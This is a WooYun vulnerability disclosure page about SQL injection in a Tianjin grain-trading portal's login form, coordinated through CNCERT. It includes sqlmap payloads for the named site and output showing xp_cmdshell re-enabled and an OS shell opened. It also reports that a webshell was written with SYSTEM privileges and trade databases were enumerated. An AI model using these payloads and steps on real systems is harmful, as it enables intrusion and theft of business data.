当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0112978

漏洞标题:天津某行业门户网站存在SQL注入漏洞getshell并可致泄露巨量交易数据

相关厂商:津粮网

漏洞作者: Hckmaple

提交时间:2015-05-20 15:50

修复时间:2015-07-09 11:28

公开时间:2015-07-09 11:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-20: 细节已通知厂商并且等待厂商处理中
2015-05-25: 厂商已经确认,细节仅向厂商公开
2015-06-04: 细节向核心白帽子及相关领域专家公开
2015-06-14: 细节向普通白帽子公开
2015-06-24: 细节向实习白帽子公开
2015-07-09: 细节向公众公开

简要描述:

注入.。。求邀请码

详细说明:

漏洞链接:http://tjgrain.com/userlogin.asp
其中的name存在sql注入,话说这站好歹pr5,不应该存在这么明显的洞。。。
sqlmap跑一下
结果如下图

QQ截图20150508085402.png


QQ截图20150508085758.png


QQ截图20150508090756.png


18个库

QQ截图20150508090838.png


随表找了一个,里面有几十个表,这个站是粮油交易的门户网站,相关的交易信息就都在这些库了

QQ截图20150508090939.png


QQ截图20150508095604.png


写个shell进去,居然是system权限,服务器get

QQ截图20150508100426.png


QQ截图20150508231319.png


裤子太大,网速不给力就不脱了

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: name    Type: error-based    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause    Payload: job=login&name=' AND 5032=CONVERT(INT,(CHAR(58)+CHAR(98)+CHAR(114)+CHAR(104)+CHAR(58)+(SELECT (CASE WHEN (5032=5032) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(109)+CHAR(101)+CHAR(121)+CHAR(58))) AND 'YrDi'='YrDi&pass=&submit=进 入    Type: UNION query    Title: Generic UNION query (NULL) - 1 to 10 columns    Payload: job=login&name=' UNION ALL SELECT NULL, NULL, NULL, NULL, CHAR(58)+CHAR(98)+CHAR(114)+CHAR(104)+CHAR(58)+CHAR(69)+CHAR(109)+CHAR(88)+CHAR(103)+CHAR(73)+CHAR(86)+CHAR(88)+CHAR(88)+CHAR(87)+CHAR(82)+CHAR(58)+CHAR(109)+CHAR(101)+CHAR(121)+CHAR(58), NULL, NULL, NULL, NULL, NULL-- AND 'rnET'='rnET&pass=&submit=进 入    Type: stacked queries    Title: Microsoft SQL Server/Sybase stacked queries    Payload: job=login&name='; WAITFOR DELAY '0:0:5';-- AND 'xBwX'='xBwX&pass=&submit=进 入    Type: AND/OR time-based blind    Title: Microsoft SQL Server/Sybase time-based blind    Payload: job=login&name=' WAITFOR DELAY '0:0:5'-- AND 'UyAy'='UyAy&pass=&submit=进 入---do you want to exploit this SQL injection? [Y/n][10:47:51] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2000[10:47:51] [INFO] testing if current user is DBA[10:47:51] [INFO] read from file 'C:\Python27\sqlmap\output\tjgrain.com\session': 1[10:47:51] [INFO] checking if xp_cmdshell extended procedure is available, please wait..[10:47:51] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..xp_cmdshell extended procedure does not seem to be available. Do you want sqlmap to try to re-enable it? [Y/n] y[10:48:05] [INFO] xp_cmdshell re-enabled successfully[10:48:06] [INFO] going to use xp_cmdshell extended procedure for operating system command execution[10:48:06] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTERos-shell> net userdo you want to retrieve the command standard output? [Y/n/a][10:48:15] [INFO] the SQL query used returns 1 entriescommand standard output:---\\ \b5\c4\d3\c3\bb\a7\d5\ca\bb\a7-------------------------------------------------------------------------------admin                    ASPNET                   Guest

漏洞证明:


QQ截图20150508085402.png


QQ截图20150508085758.png


QQ截图20150508090756.png


18个库

QQ截图20150508090838.png


随表找了一个,里面有几十个表,这个站是粮油交易的门户网站,相关的交易信息就都在这些库了

QQ截图20150508090939.png


QQ截图20150508095604.png


写个shell进去,居然是system权限,服务器get

QQ截图20150508100426.png


QQ截图20150508231319.png

修复方案:

过滤

版权声明:转载请注明来源 Hckmaple@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-05-25 11:27

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给天津分中心,由其后续协调网站管理单位处置。

最新状态:

暂无